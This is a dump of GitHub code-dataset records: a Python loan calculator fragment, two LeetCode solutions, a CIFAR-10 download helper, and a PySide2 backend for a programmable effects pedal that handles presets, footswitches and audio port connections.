else:\n #For this else block, loan['principal'] will be negative\n loan['money paid'] += loan['monthly payment'] + loan['principal']\n loan['principal'] = 0\n\n\ndef summarize_loan(loan, number, initial_principal):\n \"\"\"Display the results of paying off the loan\"\"\"\n print(\"\\nCongraulations! You paid off your loan in \" + str(number) + \"months!\")\n print(\"Your initial loan was $\" + str(initial_principal) + \" at a rate of \"+ str(100*loan['rate']) + \"%.\")\n print(\"Your monthly payment was $\" + str(loan['monthly payment']) + \".\")\n print(\"You spent $\" + str(round(loan['money paid'], 2)) + \" in total.\")\n\n #Calculate money spent on interest\n interest = round(loan['money paid'] - initial_principal, 2)\n print(\"You spent $\" + str(interest) + \" on interest!\")\n\ndef create_graph(data, loan):\n \"\"\"Create a graph to show the relationship between principal and time\"\"\"\n x_values = [] #These represent month numbers\n y_values = [] #These represent corresponding principal values\n \n #Loop through data set. 
Point is a tuple.\n #point[0] represents a month number, point[1] represents a principal value.\n for point in data:\n x_values.append(point[0])\n y_values.append(point[1])\n \n #Create a plot for x_values and y_values (month number and principal)\n pyplot.plot(x_values, y_values)\n pyplot.title(str(100*loan['rate']) + \"% Interest With $\" + str(loan['monthly payment']) + \" Monthly Payment\")\n pyplot.xlabel(\"Month Number\")\n pyplot.ylabel(\"Principal of Loan\")\n \n #Display the created graph\n pyplot.show()\n","repo_name":"Sarvesh-SP/loanCalculatorApp","sub_path":"loanFunc.py","file_name":"loanFunc.py","file_ext":"py","file_size_in_byte":2867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73725447594","text":"class Solution:\n def longestConsecutive(self, nums: List[int]) -> int:\n #If its empty return 0\n if not nums:\n return 0\n # Sort array in order\n nums=sorted(nums)\n # Overall longest Sequence\n longestSequence=1\n # Current Longest Sequence\n currSequence=1\n #For each in nums starting at 1 \n for index, value in enumerate(nums[1:], start=1):\n #Check to see if it is the same as the previous number\n #If it is continue to next iteration\n if value==nums[index-1]:\n continue\n #Check to see if it is adding to the sequence and increments currentSequence\n elif value==nums[index-1]+1:\n currSequence+=1\n #Else reset the current sequence\n else:\n currSequence=1\n #Finally update longestSequence if currSequence is larger\n longestSequence=max(currSequence,longestSequence)\n\n return longestSequence","repo_name":"haydentinker/LeetCode","sub_path":"0128-longest-consecutive-sequence/0128-longest-consecutive-sequence.py","file_name":"0128-longest-consecutive-sequence.py","file_ext":"py","file_size_in_byte":1018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27934479160","text":"# 利用栈找对应括号,遇到左括号则进栈,遇到右括号则出栈,判断两个括号是否匹配\nclass Solution(object):\n def isValid(self, s):\n left, right = '([{', '}])'\n stack = []\n for i in s:\n if i in left:\n stack.append(i)\n if i in right:\n if not stack:\n return False\n res = stack.pop()\n if (i==')' and res!='(') or (i==']' and res!='[') or (i=='}' and res!='{'):\n return False\n return not stack","repo_name":"linwt/nowcoder-leetcode","sub_path":"leetcode_Python/020.有效的括号.py","file_name":"020.有效的括号.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"72"} +{"seq_id":"25541473901","text":"import os\nimport sys\nimport urllib.request\nimport tarfile\n\nDATA_URL = 'https://www.cs.toronto.edu/~kriz/cifar-10-binary.tar.gz'\n\ndef maybe_download_and_extract(data_dir='data'):\n dest_directory = data_dir\n os.makedirs(dest_directory, exist_ok=True)\n filename = DATA_URL.split('/')[-1]\n filepath = os.path.join(dest_directory, filename)\n\n if not os.path.exists(filepath):\n def _progress(count, block_size, total_size):\n sys.stdout.write('\\r>> Downloading {} {:.2%}%'.format(\n filename, float(count * block_size) / float(total_size) * 100.0))\n sys.stdout.flush()\n\n filepath, _ = urllib.request.urlretrieve(DATA_URL, filepath, _progress)\n statinfo = os.stat(filepath)\n print('\\nSuccessfully downloaded', filename, statinfo.st_size, 'bytes.')\n\n extracted_dir_path = os.path.join(dest_directory, 'cifar-10-batches-bin')\n if not os.path.exists(extracted_dir_path):\n tarfile.open(filepath, 
'r:gz').extractall(dest_directory)\n","repo_name":"PauloKeller/AI","sub_path":"Learn-Artificial-Intelligence-with-TensorFlow/section-2/cifar10_input.py","file_name":"cifar10_input.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"28690533069","text":"import sys, time, json, os.path, os, subprocess, queue, threading, traceback, glob\nimport shutil\nos.environ[\"QT_IM_MODULE\"] = \"qtvirtualkeyboard\"\nfrom signal import signal, SIGINT, SIGTERM\nfrom time import sleep\nfrom sys import exit\nfrom collections import OrderedDict\nfrom enum import Enum, IntEnum\nimport urllib.parse\nfrom pathlib import Path\n# import random\nfrom PySide2.QtGui import QGuiApplication\nfrom PySide2.QtCore import QObject, QUrl, Slot, QStringListModel, Property, Signal, QTimer, QThreadPool, QRunnable, qWarning, qCritical, qDebug\nfrom PySide2.QtQml import QQmlApplicationEngine, qmlRegisterType\nfrom PySide2.QtGui import QIcon, QFontDatabase, QFont\n# # compiled QML files, compile with pyside2-rcc\n# import qml.qml\n# profiler\n# from PySide2.QtQml import QQmlDebuggingEnabler\n# debug = QQmlDebuggingEnabler()\n\nsys._excepthook = sys.excepthook\ndef exception_hook(exctype, value, tb):\n debug_print(\"except hook 1 got a thing!\") #, exctype, value, traceback)\n traceback.print_exception(exctype, value, tb)\n sys._excepthook(exctype, value, tb)\n sys.exit(1)\nsys.excepthook = exception_hook\n\nos.environ[\"QT_IM_MODULE\"] = \"qtvirtualkeyboard\"\nimport icons.icons\n# #, imagine_assets\nimport resource_rc\n\nimport properties\n\nimport ingen_wrapper\nimport pedal_hardware\nimport module_info\nfrom static_globals import IS_REMOTE_TEST\nimport loopler as loopler_lib\nimport module_browser_model\nimport preset_browser_model\nimport amp_browser_model\nimport ir_browser_model\n\nworker_pool = QThreadPool()\nEXIT_PROCESS = [False]\nui_messages = queue.Queue()\n\ncurrent_source_port = None\ncurrent_sub_graph = \"/main/sub1/\"\nsub_graphs = set([\"/main/sub1\"])\n# current_effects = OrderedDict()\ncurrent_effects = {}\n# current_effects[\"delay1\"] = {\"x\": 20, \"y\": 30, \"effect_type\": \"delay\", \"controls\": {}, \"highlight\": False}\n# current_effects[\"delay2\"] = {\"x\": 250, \"y\": 290, \"effect_type\": \"delay\", \"controls\": {}, \"highlight\": False}\nport_connections = {} # key is port, value is list of ports\ncurrent_patchbay_mode = 0\ncurrent_selected_effect = \"\"\nfootswitch_assignments = {}\nlooper_footswitch_assignments = {}\npreset_started_loading_time = 0\n\ndef reset_footswitch_assignments():\n global footswitch_assignments\n footswitch_assignments = {\"a\":set(), \"b\":set(), \"c\":set(), \"d\":set(), \"e\":set()}\n\nreset_footswitch_assignments()\n\ndef reset_looper_footswitch_assignments():\n global looper_footswitch_assignments\n looper_footswitch_assignments = {\"a\":[], \"b\":[], \"c\":[], \"d\":[], \"e\":[]}\n\nreset_looper_footswitch_assignments()\n\nclass PatchMode(IntEnum):\n SELECT = 0\n MOVE = 1\n CONNECT = 2\n SLIDERS = 3\n DETAILS = 4\n HOLD = 5\n\ncontext = None\namp_browser_model_s = None\n\ndef debug_print(*args, **kwargs):\n pass\n # print( \"From py: \"+\" \".join(map(str,args)), **kwargs)\n\n\neffect_type_maps = module_info.effect_type_maps\n\neffect_prototypes_models_all = module_info.effect_prototypes_models_all\n\nfor k, v in effect_prototypes_models_all.items():\n n = 0\n for p in v[\"inputs\"].values():\n if p[1] == \"CVPort\":\n n = n + 1\n 
effect_prototypes_models_all[k][\"num_cv_in\"] = n\n\neffect_prototypes_models = {\"beebo\": {k:effect_prototypes_models_all[k] for k in effect_type_maps[\"beebo\"].keys()}}\n\nfor k in effect_prototypes_models.keys():\n effect_prototypes_models[k][\"input\"] = {\"inputs\": {},\n \"outputs\": {\"output\": [\"in\", \"AudioPort\"]},\n \"num_cv_in\": 0,\n \"controls\": {}}\n effect_prototypes_models[k][\"output\"] = {\"inputs\": {\"input\": [\"out\", \"AudioPort\"]},\n \"outputs\": {},\n \"num_cv_in\": 0,\n \"controls\": {}}\n effect_prototypes_models[k][\"midi_input\"] = {\"inputs\": {},\n \"outputs\": {\"output\": [\"in\", \"AtomPort\"]},\n \"num_cv_in\": 0,\n \"controls\": {}}\n effect_prototypes_models[k][\"midi_output\"] = {\"inputs\": {\"input\": [\"out\", \"AtomPort\"]},\n \"outputs\": {},\n \"num_cv_in\": 0,\n \"controls\": {}}\n\nbare_output_ports = (\"output\", \"midi_output\", \"loop_common_in\", \"loop_extra_midi\")\nbare_input_ports = (\"input\", \"midi_input\", \"loop_common_out\", \"loop_midi_out\")\nbare_ports = bare_output_ports + bare_input_ports\nloopler_modules = [\"loop_common_in\", \"loop_common_out\", \"loop_extra_midi\", \"loop_midi_out\"]\n\n\ndef clamp(v, min_value, max_value):\n return max(min(v, max_value), min_value)\n\ndef insert_row(model, row):\n j = len(model.stringList())\n model.insertRows(j, 1)\n model.setData(model.index(j), row)\n\ndef remove_row(model, row):\n i = model.stringList().index(row)\n model.removeRows(i, 1)\n\npreset_list = []\npreset_list_model = QStringListModel(preset_list)\nhardware_info = {}\ndef load_preset_list():\n global preset_list\n try:\n with open(\"/mnt/pedal_state/beebo_preset_list.json\") as f:\n preset_list = json.load(f)\n except:\n preset_list = [\"file:///mnt/presets/beebo/Empty.ingen\"]\n preset_list_model.setStringList(preset_list)\n\ntry:\n with open(\"/pedal_state/hardware_info.json\") as f:\n hardware_info = json.load(f)\n hardware_info[\"revision\"]\nexcept:\n hardware_info = {\"revision\": 10, \"pedal\": \"beebo\"}\n\nif hardware_info[\"pedal\"] == \"digit\":\n hardware_info[\"pedal\"] = \"beebo\"\n\nclass MyEmitter(QObject):\n # setting up custom signal\n done = Signal(int)\n stdout = Signal(str)\n\nclass MyWorker(QRunnable):\n\n def __init__(self, command, after=None):\n super(MyWorker, self).__init__()\n self.command = command\n self.after = after\n self.emitter = MyEmitter()\n\n def run(self):\n # run subprocesses, grab output\n ret_var = subprocess.run(self.command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True, shell=True)\n if self.after is not None:\n self.after()\n self.emitter.done.emit(ret_var.returncode)\n self.emitter.stdout.emit(ret_var.stdout+ret_var.stderr)\n\nclass MyTask(QRunnable):\n\n def __init__(self, delay, command):\n super(MyTask, self).__init__()\n self.command = command\n self.delay = delay\n self.emitter = MyEmitter()\n\n def run(self):\n # run subprocesses, grab output\n time.sleep(self.delay)\n ret_var = self.command()\n self.emitter.done.emit(ret_var)\n\nclass PolyBool(QObject):\n # name, min, max, value\n def __init__(self, startval=False):\n QObject.__init__(self)\n self.valueval = startval\n\n def readValue(self):\n return self.valueval\n\n def setValue(self,val):\n self.valueval = val\n self.value_changed.emit()\n\n @Signal\n def value_changed(self):\n pass\n\n value = Property(bool, readValue, setValue, notify=value_changed)\n\nclass PolyStr(QObject):\n # name, min, max, value\n def __init__(self, startval=False):\n QObject.__init__(self)\n self.valueval = 
startval\n\n def readValue(self):\n return self.valueval\n\n def setValue(self,val):\n self.valueval = val\n self.value_changed.emit()\n\n @Signal\n def value_changed(self):\n pass\n\n value = Property(str, readValue, setValue, notify=value_changed)\n\nclass PatchBayNotify(QObject):\n\n def __init__(self):\n QObject.__init__(self)\n\n add_module = Signal(str)\n remove_module = Signal(str)\n loading_preset = Signal(bool)\n loading_preset_done = Signal(str)\n\n\n# class PolyEncoder(QObject):\n# # name, min, max, value\n# def __init__(self, starteffect=\"\", startparameter=\"\"):\n# QObject.__init__(self)\n# self.effectval = starteffect\n# self.parameterval = startparameter\n# self.speed = 1\n# self.value = 1\n\n# def readEffect(self):\n# return self.effectval\n\n# def setEffect(self,val):\n# self.effectval = val\n# self.effect_changed.emit()\n\n# @Signal\n# def effect_changed(self):\n# pass\n\n# effect = Property(str, readEffect, setEffect, notify=effect_changed)\n\n# def readParameter(self):\n# return self.parameterval\n\n# def setParameter(self,val):\n# self.parameterval = val\n# self.parameter_changed.emit()\n\n# @Signal\n# def parameter_changed(self):\n# pass\n\n# parameter = Property(str, readParameter, setParameter, notify=parameter_changed)\n\nclass PolyValue(QObject):\n # name, min, max, value\n def __init__(self, startname=\"\", startval=0, startmin=0, startmax=1, v_type=\"float\", curve_type=\"lin\", startcc=-1):\n QObject.__init__(self)\n self.nameval = startname\n self.valueval = startval\n self.defaultval = startval\n self.rminval = startmin\n self.rmax = startmax\n self.ccval = startcc\n\n def readValue(self):\n return self.valueval\n\n def setValue(self,val):\n # clamp values\n self.valueval = clamp(val, self.rmin, self.rmax)\n self.value_changed.emit()\n # debug_print(\"setting value\", val)\n\n @Signal\n def value_changed(self):\n pass\n\n value = Property(float, readValue, setValue, notify=value_changed)\n\n def readDefaultValue(self):\n return self.defaultval\n\n def setDefaultValue(self,val):\n # clamp values\n self.defaultval = clamp(val, self.rmin, self.rmax)\n self.default_value_changed.emit()\n # debug_print(\"setting value\", val)\n\n @Signal\n def default_value_changed(self):\n pass\n\n default_value = Property(float, readDefaultValue, setDefaultValue, notify=default_value_changed)\n\n def readCC(self):\n return self.ccval\n\n def setCC(self,val):\n self.ccval = val\n self.cc_changed.emit()\n # debug_print(\"setting value\", val)\n\n @Signal\n def cc_changed(self):\n pass\n\n cc = Property(float, readCC, setCC, notify=cc_changed)\n\n def readName(self):\n return self.nameval\n\n def setName(self,val):\n self.nameval = val\n self.name_changed.emit()\n\n @Signal\n def name_changed(self):\n pass\n\n name = Property(str, readName, setName, notify=name_changed)\n\n def readRMin(self):\n return self.rminval\n\n def setRMin(self,val):\n self.rminval = val\n self.rmin_changed.emit()\n\n @Signal\n def rmin_changed(self):\n pass\n\n rmin = Property(float, readRMin, setRMin, notify=rmin_changed)\n\n def readRMax(self):\n return self.rmaxval\n\n def setRMax(self,val):\n self.rmaxval = val\n self.rmax_changed.emit()\n\n @Signal\n def rmax_changed(self):\n pass\n\n rmax = Property(float, readRMax, setRMax, notify=rmax_changed)\n\ndef jump_to_preset(is_inc, num, initial=False):\n\n if is_loading.value == True:\n return\n # TODO need to call frontend function to jump to home page\n before_change_preset_num = current_preset.value\n p_list = preset_list_model.stringList()\n 
preset_load_counter.value = preset_load_counter.value + 1\n if is_inc:\n current_preset.value = (current_preset.value + num) % len(p_list)\n else:\n if num < len(p_list):\n current_preset.value = num\n else:\n return\n if before_change_preset_num == current_preset.value and not initial:\n debug_print(\"already on preset, not jumping \", p_list[current_preset.value], \"num is\", num)\n else:\n debug_print(\"jumping to preset \", p_list[current_preset.value], \"num is\", num)\n knobs.ui_load_preset_by_name(p_list[current_preset.value])\n\ndef write_pedal_state():\n if IS_REMOTE_TEST:\n return\n with open(\"/mnt/pedal_state/state.json\", \"w\") as f:\n json.dump(pedal_state, f)\n os.sync()\n\ndef write_preset_meta_cache(initial=False):\n with open(\"/mnt/pedal_state/preset_meta.json\", \"w\") as f:\n json.dump(preset_meta_data, f)\n os.sync()\n if not initial:\n preset_browser_model_s.update_preset_meta(preset_meta_data)\n\ndef load_preset_meta_cache():\n global preset_meta_data\n try:\n with open(\"/mnt/pedal_state/preset_meta.json\") as f:\n preset_meta_data = json.load(f)\n if len(preset_meta_data) < 3: # at least some elements\n try:\n get_meta_from_files(True)\n except:\n preset_meta_data = {}\n except:\n try:\n get_meta_from_files(True)\n except:\n preset_meta_data = {}\n\ndef write_favourites_data():\n with open(\"/mnt/pedal_state/favourites.json\", \"w\") as f:\n json.dump(favourites, f)\n os.sync()\n\ndef load_favourites_data():\n global favourites\n try:\n with open(\"/mnt/pedal_state/favourites.json\") as f:\n favourites = json.load(f)\n except:\n favourites = {\"modules\":{}, \"presets\":{}}\n\n\ndef load_pedal_state():\n global pedal_state\n try:\n with open(\"/mnt/pedal_state/state.json\") as f:\n pedal_state = json.load(f)\n if \"input_level\" not in pedal_state:\n pedal_state[\"input_level\"] = 0\n if \"midi_channel\" not in pedal_state:\n pedal_state[\"midi_channel\"] = 1\n if \"author\" not in pedal_state:\n pedal_state[\"author\"] = \"poly player\"\n if \"thru\" not in pedal_state:\n pedal_state[\"thru\"] = True\n if \"invert_enc\" not in pedal_state:\n pedal_state[\"invert_enc\"] = False\n if \"screen_flipped\" not in pedal_state:\n pedal_state[\"screen_flipped\"] = False\n if \"l_to_r\" not in pedal_state:\n pedal_state[\"l_to_r\"] = False\n if \"d_is_tuner\" not in pedal_state:\n pedal_state[\"d_is_tuner\"] = True\n except:\n pedal_state = {\"input_level\": 0, \"midi_channel\": 1, \"author\": \"poly player\",\n \"model\": \"beebo\", \"thru\": True, \"invert_enc\": False, \"screen_flipped\": False, \"l_to_r\": False,\n \"d_is_tuner\": True}\n\n\nselected_source_effect_ports = QStringListModel()\nselected_source_effect_ports.setStringList([\"val1\", \"val2\"])\nselected_dest_effect_ports = QStringListModel()\nselected_dest_effect_ports.setStringList([\"val1\", \"val2\"])\nseq_num = 10\n\nsub_graph_suffix = 0\ndef add_inc_sub_graph(actually_add=True):\n global sub_graph_suffix\n sub_graph_suffix = sub_graph_suffix + 1\n name = \"/main/sub\"+str(sub_graph_suffix)+\"/\"\n global current_sub_graph\n current_sub_graph = name\n sub_graphs.add(name.rstrip(\"/\"))\n if actually_add:\n add_sub_graph(name)\n return name\n\ndef add_sub_graph(name):\n ingen_wrapper.add_sub_graph(name.rstrip(\"/\"))\n global current_sub_graph\n current_sub_graph = name\n sub_graphs.add(name.rstrip(\"/\"))\n\ndef delete_sub_graph(name):\n name = name.rstrip(\"/\")\n if name in sub_graphs:\n ingen_wrapper.remove_plugin(name)\n sub_graphs.remove(name)\n\ndef loopler_in_use():\n # debug_print(\"checking if 
loopler is in use\", current_effects.keys())\n num_modules = 0\n for effect in current_effects.values():\n if effect[\"effect_type\"] in loopler_modules:\n num_modules = num_modules + 1\n return num_modules\n\n\ndef load_preset(name, initial=False, force=False):\n if is_loading.value == True and not force:\n return\n is_loading.value = True\n global preset_started_loading_time\n preset_started_loading_time = time.perf_counter()\n # is_loading.value = True\n # delete existing blocks\n port_connections.clear()\n reset_footswitch_assignments()\n knobs.spotlight_entries = []\n preset_description.name = \"Tap here to enter preset description\"\n to_delete = list(current_effects.keys())\n for effect_id in to_delete:\n if effect_id in [\"/main/out_1\", \"/main/out_2\", \"/main/out_3\", \"/main/out_4\", \"/main/in_1\", \"/main/in_2\", \"/main/in_3\", \"/main/in_4\"]:\n pass\n else:\n patch_bay_notify.remove_module.emit(effect_id)\n try:\n current_effects.pop(effect_id)\n except:\n pass\n if not initial:\n # debug_print(\"deleting sub graph\", current_sub_graph)\n delete_sub_graph(current_sub_graph)\n if loopler.is_running:\n loopler.stop_loopler()\n reset_looper_footswitch_assignments()\n add_inc_sub_graph(False)\n # debug_print(\"adding inc sub graph\", current_sub_graph)\n ingen_wrapper.load_pedalboard(name, current_sub_graph.rstrip(\"/\"))\n context.setContextProperty(\"currentEffects\", current_effects) # might be slow\n context.setContextProperty(\"portConnections\", port_connections)\n # if this preset has a looper config, load it\n # check if preset file exists\n\n loopler_file = name[len(\"file://\"):].rsplit(\"/\", 1)[0] + \"/loopler.slsess\"\n debug_print(\"checking if loopler_file exists\", loopler_file)\n if os.path.exists(loopler_file):\n loopler.session_file = loopler_file\n debug_print(\"it does\", loopler_file)\n time.sleep(0.1)\n ingen_wrapper.get_state(\"/engine\")\n\ndef from_backend_new_effect(effect_name, effect_type, x=20, y=30, is_enabled=True):\n # called by engine code when new effect is created\n # debug_print(\"from backend new effect\", effect_name, effect_type)\n if effect_type in effect_prototypes:\n broadcast_ports = {}\n if \"broadcast_ports\" in effect_prototypes[effect_type]:\n broadcast_ports = {k : PolyValue(*v) for k,v in effect_prototypes[effect_type][\"broadcast_ports\"].items()}\n current_effects[effect_name] = {\"x\": x, \"y\": y, \"effect_type\": effect_type,\n \"controls\": {k : PolyValue(*v) for k,v in effect_prototypes[effect_type][\"controls\"].items()},\n \"assigned_footswitch\": PolyStr(\"\"),\n \"broadcast_ports\" : broadcast_ports,\n \"enabled\": PolyBool(is_enabled)}\n # insert in context or model? 
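\n # each current_effects entry is a plain dict of UI state; roughly (illustrative\n # values -- \"delay\" and \"time\" are made-up names, not necessarily real modules):\n # {\"x\": 20, \"y\": 30, \"effect_type\": \"delay\",\n # \"controls\": {\"time\": PolyValue(...)}, \"assigned_footswitch\": PolyStr(\"\"),\n # \"broadcast_ports\": {...}, \"enabled\": PolyBool(True)}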
\n # emit add signal\n context.setContextProperty(\"currentEffects\", current_effects) # might be slow\n patch_bay_notify.add_module.emit(effect_name)\n # if loopler isn't already running, start it\n if effect_type in loopler_modules:\n if not loopler.is_running:\n loopler.start_loopler()\n # if effect_type == \"midi_clock_in\":\n # # set broadcast on port\n # ingen_wrapper.set_broadcast(effect_name+\"/bpm\", True)\n # if effect_type == \"tuner\": # tuner starts bypassed\n # knobs.set_bypass(effect_name, False)\n else:\n debug_print(\"### backend tried to add an unknown effect!\")\n\ndef from_backend_remove_effect(effect_name):\n # called by engine code when effect is removed\n if effect_name not in current_effects:\n return\n effect_type = current_effects[effect_name][\"effect_type\"]\n debug_print(\"### from backend removing effect\")\n\n # if we're in spotlight, remove from spotlight\n if len([[k, v, v2] for k,v,v2 in knobs.spotlight_entries if k == effect_name]) > 0:\n\n for spotlight_entry in knobs.spotlight_entries:\n if spotlight_entry[0] == effect_name:\n spotlight_entries_changed(spotlight_entry[0], spotlight_entry[1], '', spotlight_entry[2])\n knobs.spotlight_entries = [[k, v, v2] for k,v, v2 in knobs.spotlight_entries if k != effect_name]\n # emit remove signal\n for source_port, targets in list(port_connections.items()):\n s_effect, s_port = source_port.rsplit(\"/\", 1)\n if s_effect == effect_name:\n del port_connections[source_port]\n else:\n port_connections[source_port] = [[e, p] for e, p in port_connections[source_port] if e != effect_name]\n\n # if this was a looper module, check if there are any left\n if effect_type in loopler_modules:\n if loopler_in_use() <= 1:\n if loopler.is_running:\n loopler.stop_loopler()\n reset_looper_footswitch_assignments()\n patch_bay_notify.remove_module.emit(effect_name)\n for k in footswitch_assignments.keys(): # if this module has a foot switch assigned to it\n footswitch_assignments[k].discard(effect_name)\n # debug_print(\"removing effects, current keys\", current_effects.keys())\n\n # current_effects.pop(effect_name) # done after UI removes it\n context.setContextProperty(\"portConnections\", port_connections)\n ingen_wrapper.get_state(\"/engine\")\n # debug_print(\"### from backend removing effect setting portConnections\")\n update_counter.value+=1\n\ndef from_backend_add_connection(head, tail):\n # debug_print(\"head \", head, \"tail\", tail)\n current_source_port = head\n if current_source_port.rsplit(\"/\", 1)[0] in sub_graphs:\n s_effect = current_source_port\n # debug_print(\"## s_effect\", s_effect)\n if s_effect not in current_effects:\n return\n s_effect_type = current_effects[s_effect][\"effect_type\"]\n if s_effect_type in bare_output_ports:\n s_port = \"input\"\n elif s_effect_type in bare_input_ports:\n s_port = \"output\"\n current_source_port = s_effect + \"/\" + s_port\n # debug_print(\"## current_source_port\", current_source_port)\n else:\n if current_source_port.rsplit(\"/\", 1)[0] == \"/main\":\n return\n # debug_print(\"## current_source_port not in sub graph\", current_source_port, sub_graphs)\n\n\n effect_id_port_name = tail.rsplit(\"/\", 1)\n if effect_id_port_name[0] in sub_graphs :\n t_effect = tail\n if t_effect not in current_effects:\n return\n t_effect_type = current_effects[t_effect][\"effect_type\"]\n t_port = None\n if t_effect_type in bare_output_ports:\n t_port = \"input\"\n elif t_effect_type in bare_input_ports:\n t_port = \"output\"\n # debug_print(\"## tail in sub_graph\", tail, t_effect, 
t_port)\n if t_port is None:\n return\n else:\n if effect_id_port_name[0] == \"/main\":\n return\n # print(\"effect_id_port_name\", effect_id_port_name)\n t_effect, t_port = effect_id_port_name\n # debug_print(\"## tail not in sub_graph\", tail, t_effect, t_port, sub_graphs)\n if t_effect not in current_effects:\n return\n\n if current_source_port not in port_connections:\n port_connections[current_source_port] = []\n if [t_effect, t_port] not in port_connections[current_source_port]:\n port_connections[current_source_port].append([t_effect, t_port])\n\n # debug_print(\"port_connections is\", port_connections)\n # global context\n context.setContextProperty(\"portConnections\", port_connections)\n update_counter.value+=1\n\n\ndef from_backend_disconnect(head, tail):\n # debug_print(\"head \", head, \"tail\", tail)\n current_source_port = head\n # default the port names to None so an unmatched bare-port type bails out\n # instead of raising NameError (mirrors the t_port guard in from_backend_add_connection)\n s_port = None\n t_port = None\n try:\n if current_source_port.rsplit(\"/\", 1)[0] in sub_graphs:\n s_effect = current_source_port\n s_effect_type = current_effects[s_effect][\"effect_type\"]\n if s_effect_type in bare_output_ports:\n s_port = \"input\"\n elif s_effect_type in bare_input_ports:\n s_port = \"output\"\n if s_port is None:\n return\n current_source_port = s_effect + \"/\" + s_port\n\n effect_id_port_name = tail.rsplit(\"/\", 1)\n if effect_id_port_name[0] in sub_graphs:\n t_effect = tail\n t_effect_type = current_effects[t_effect][\"effect_type\"]\n if t_effect_type in bare_output_ports:\n t_port = \"input\"\n elif t_effect_type in bare_input_ports:\n t_port = \"output\"\n if t_port is None:\n return\n else:\n t_effect, t_port = effect_id_port_name\n except KeyError:\n return\n\n # debug_print(\"before port_connections is\", port_connections)\n if current_source_port in port_connections and [t_effect, t_port] in port_connections[current_source_port]:\n port_connections[current_source_port].pop(port_connections[current_source_port].index([t_effect, t_port]))\n # debug_print(\"after port_connections is\", port_connections)\n # global context\n context.setContextProperty(\"portConnections\", port_connections)\n update_counter.value+=1\n\ndef get_meta_from_files(initial=False):\n r_dict = {}\n def get_rdf_element_from_files(rdf_name=\"rdfs:comment\", element_name=\"description\"):\n command = 'grep -ir \"'+ rdf_name +'\" /mnt/presets'\n # command = ['grep' , '-ir', '\"'+ element_name +'\"', '/mnt/presets']\n ret_obj = subprocess.run(command, capture_output=True, shell=True)\n for a in ret_obj.stdout.splitlines():\n try:\n b = a.decode().split(\":\", 1)\n v = b[1].split('\"')[1]\n preset_name = b[0].rsplit(\"/\", 1)[0]\n if preset_name not in r_dict:\n r_dict[preset_name] = {}\n r_dict[preset_name][element_name] = v\n except:\n pass\n get_rdf_element_from_files(\"rdfs:comment\", \"description\")\n get_rdf_element_from_files(\"doap:maintainer\", \"author\")\n get_rdf_element_from_files(\"doap:category\", \"tags\")\n global preset_meta_data\n preset_meta_data = r_dict\n # flush to file\n write_preset_meta_cache(initial)\n\ndef du(path):\n \"\"\"disk usage in human readable format (e.g. 
'2,1GB')\"\"\"\n return subprocess.check_output(['du','-sh', path]).split()[0].decode('utf-8')\n\nclass Knobs(QObject, metaclass=properties.PropertyMeta):\n spotlight_entries = properties.Property(list)\n\n def __init__(self, parent=None):\n super().__init__(parent)\n self.spotlight_entries = []\n # type(self).__dict__[\"spotlight_entries\"].setter(self, [])\n\n @Slot(bool, str, str)\n def set_current_port(self, is_source, effect_id, port_name):\n # debug_print(\"port name is\", port_name, \"effect id\", effect_id)\n # if source, highlight targets\n if is_source:\n # set current source port\n # effect_id, port_name\n # highlight effects given source port\n global current_source_port\n current_source_port = \"/\".join((effect_id, port_name))\n connect_source_port.name = current_source_port\n else:\n # add connection between source and target\n # or just wait until it's automatically created from engine? \n # if current_source_port not in port_connections:\n # port_connections[current_source_port] = []\n # if [effect_id, port_name] not in port_connections[current_source_port]:\n # port_connections[current_source_port].append([effect_id, port_name])\n\n\n s_effect, s_port = current_source_port.rsplit(\"/\", 1)\n s_effect_type = current_effects[s_effect][\"effect_type\"]\n t_effect_type = current_effects[effect_id][\"effect_type\"]\n if t_effect_type in bare_ports:\n if s_effect_type in bare_ports:\n ingen_wrapper.connect_port(s_effect, effect_id)\n else:\n ingen_wrapper.connect_port(current_source_port, effect_id)\n else:\n if s_effect_type in bare_ports:\n ingen_wrapper.connect_port(s_effect, effect_id+\"/\"+port_name)\n else:\n ingen_wrapper.connect_port(current_source_port, effect_id+\"/\"+port_name)\n\n\n # if [effect_id, port_name] not in inv_port_connections:\n # inv_port_connections[[effect_id, port_name]] = []\n # if current_source_port not in inv_port_connections[[effect_id, port_name]]:\n # inv_port_connections[[effect_id, port_name]].append(current_source_port)\n\n # debug_print(\"port_connections is\", port_connections)\n # global context\n # context.setContextProperty(\"portConnections\", port_connections)\n\n\n @Slot(bool, str, bool)\n def select_effect(self, is_source, effect_id, interconnect=False):\n restrict_port_types = not interconnect\n effect_type = current_effects[effect_id][\"effect_type\"]\n # debug_print(\"selecting effect type\", effect_type, is_source, \"interconnect is \", interconnect)\n if is_source:\n ports = sorted([v[1]+'|'+v[0]+'|'+k for k,v in effect_prototypes[effect_type][\"outputs\"].items()])\n selected_source_effect_ports.setStringList(ports)\n else:\n\n s_effect_id, s_port = connect_source_port.name.rsplit(\"/\", 1)\n source_port_type = effect_prototypes[current_effects[s_effect_id][\"effect_type\"]][\"outputs\"][s_port][1]\n # on hector: if the source is a physical input or the target is a physical output,\n # disable restrict_port_types\n if current_pedal_model.name == \"hector\":\n if effect_type in [\"output\", \"midi_output\"] or current_effects[s_effect_id][\"effect_type\"] in [\"input\", \"midi_input\"]:\n restrict_port_types = False\n\n if restrict_port_types or source_port_type == \"AtomPort\":\n ports = sorted([v[1]+'|'+v[0]+'|'+k for k,v in effect_prototypes[effect_type][\"inputs\"].items() if v[1] == source_port_type])\n else:\n ports = sorted([v[1]+'|'+v[0]+'|'+k for k,v in effect_prototypes[effect_type][\"inputs\"].items() if (v[1] not in [\"AtomPort\", \"ControlPort\"])])\n\n # debug_print(\"ports is \", ports)\n 
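# each entry packs \"PortType|Display name|symbol\" into one string, e.g.\n # \"AudioPort|Left In|in_l\" (illustrative values); the QML side presumably splits on \"|\"\n 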
